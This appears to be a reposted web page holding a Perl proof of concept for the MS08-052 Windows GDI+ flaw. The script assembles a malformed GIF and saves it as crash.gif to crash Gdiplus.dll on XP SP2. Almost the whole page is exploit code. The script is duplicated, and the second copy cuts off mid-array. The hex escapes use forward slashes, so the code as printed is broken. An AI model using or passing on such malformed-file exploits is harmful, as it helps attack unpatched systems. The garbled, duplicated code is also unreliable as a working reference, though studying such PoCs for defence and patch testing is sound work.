MS Windows GDI+ Proof of Concept (MS08-052) #2
来源:互联网 发布:json视图编辑器 编辑:程序博客网 时间:2024/06/07 02:01
------------------------------------------------------------------------------------------------------------
Operating System: XP SP2
Gdiplus.dll Version: 5.1.3102.2180
Credit:
John Smith,
Evil Fingers
GIF Template Reference: http://www.sweetscape.com/010editor/templates/files/GIFTemplate.bt
PoC Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability_ver2.txt
http://www.evilfingers.com/patchTuesday/PoC.php
============================================================================================================
#!/usr/bin/perl
#
use strict;
my $gif =
"/x47/x49/x46/x38/x39/x61". # GIF header
"/x65/x00/x65/x00/xF7/x0B/x0B". # Logical Screen Descriptor
# COLOR Stream
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x21". ## Extension Introducer 0x21
"/x2C". ## Label 0x2C
# Data Sub-blocks (1) Size: 21+1
#0
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC".
#1
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/x2C/x21/xEC".
"/x21/xEC".
#2
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC".
#3
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC".
#4
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC/x21/xEC/x21/xEC/x21/x2C/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC".
#5
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC".
#6
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC".
#7
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/x2C/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC".
#8
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC".
#9
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC".
#10
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/x2C/x21/xEC/x21/xEC".
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC".
#11
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x2C/x00/x00/x00/x00/x0E".
"/x01/x5A".
"/x00". ## Terminator
"/x21". ## Extension Introducer 0x21
"/x2C". ## Label 0x2C
# Data Sub-blocks (2) Size: EC+1
#0
"/xEC/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62".
#1
"/xEC/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62".
#2
"/xEC/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62".
#3
"/xEC/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62".
#4
"/xEC/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62".
"/x00". # Terminator
"/x3B". # Trailer
open(out, "> crash.gif");
binmode(out);
print (out $gif);
close(out);
Operating System: XP SP2
Gdiplus.dll Version: 5.1.3102.2180
Credit:
John Smith,
Evil Fingers
GIF Template Reference: http://www.sweetscape.com/010editor/templates/files/GIFTemplate.bt
PoC Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability_ver2.txt
http://www.evilfingers.com/patchTuesday/PoC.php
============================================================================================================
#!/usr/bin/perl
#
use strict;
my $gif =
"/x47/x49/x46/x38/x39/x61". # GIF header
"/x65/x00/x65/x00/xF7/x0B/x0B". # Logical Screen Descriptor
# COLOR Stream
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33/x33".
"/x21". ## Extension Introducer 0x21
"/x2C". ## Label 0x2C
# Data Sub-blocks (1) Size: 21+1
#0
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC".
#1
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/x2C/x21/xEC".
"/x21/xEC".
#2
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC".
#3
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC".
#4
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC/x21/xEC/x21/xEC/x21/x2C/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC".
#5
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC".
#6
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC".
#7
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/x2C/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC".
#8
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC".
#9
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC".
#10
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/x2C/x21/xEC/x21/xEC".
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC".
#11
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC".
"/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x21/xEC/x2C/x00/x00/x00/x00/x0E".
"/x01/x5A".
"/x00". ## Terminator
"/x21". ## Extension Introducer 0x21
"/x2C". ## Label 0x2C
# Data Sub-blocks (2) Size: EC+1
#0
"/xEC/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62".
#1
"/xEC/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62".
#2
"/xEC/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
"/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61/x62/x61".
